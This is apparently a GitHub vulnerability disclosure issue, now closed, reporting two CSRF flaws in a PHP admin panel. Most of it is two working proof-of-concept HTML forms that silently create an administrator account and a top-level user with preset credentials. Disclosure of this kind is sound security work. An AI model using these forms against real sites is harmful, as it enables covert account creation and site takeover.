This repository was archived by the owner on Apr 14, 2021. It is now read-only.
This repository was archived by the owner on Apr 14, 2021. It is now read-only.
There is two CSRF vulnerability that can add the administrator account #20
Closed
Description
After the administrator logged in, open the following two page
poc:
add_admin.html
<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=manager&a=add" method="post">
<div class="form-group">
<label>用户名</label>
<input class="form-control" type="text" name="username" value="csrf">
</div>
<div class="form-group">
<label>邮箱</label>
<input class="form-control" type="text" name="email" value="csrf@test.com">
</div>
<div class="form-group">
<label>密码</label>
<input class="form-control" type="password" name="password" value="123456">
</div>
<div class="form-group">
<label>确认密码</label>
<input class="form-control" type="password" name="repassword" value="123456">
</div>
<div class="form-group">
<button class="btn btn-success" type="submit" >添加</button>
</div>
</form>
</html>
add_user.html
<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=member&a=add" method="post">
<div class="form-group">
<label>用户名</label>
<input class="form-control" type="text" name="username" value="test">
</div>
<div class="form-group">
<label>邮箱</label>
<input class="form-control" type="text" name="email" value="test@test.com">
</div>
<div class="form-group">
<label>密码</label>
<input class="form-control" type="password" name="password" value="123456">
</div>
<div class="form-group">
<label>确认密码</label>
<input class="form-control" type="password" name="repassword" value="123456">
</div>
<div class="form-group">
<label>用户等级</label>
<label class="radio-inline">
<input type="radio" name="type" id="type" value="1" >路人
</label>
<label class="radio-inline">
<input type="radio" name="type" id="type" value="2" >实习白帽子
</label>
<label class="radio-inline">
<input type="radio" name="type" id="type" value="3" >普通白帽子
</label>
<label class="radio-inline">
<input type="radio" name="type" id="type" checked="checked" value="4" >核心白帽子
</label>
</div>
<div class="form-group">
<label>用户状态</label>
<label class="radio-inline">
<input type="radio" name="status" id="status" value="0">禁止登陆
</label>
<label class="radio-inline">
<input type="radio" name="status" id="status" value="1" checked="checked">正常
</label>
</div>
<div class="form-group">
<button class="btn btn-success" type="submit" >添加</button>
</div>
</form>
</html>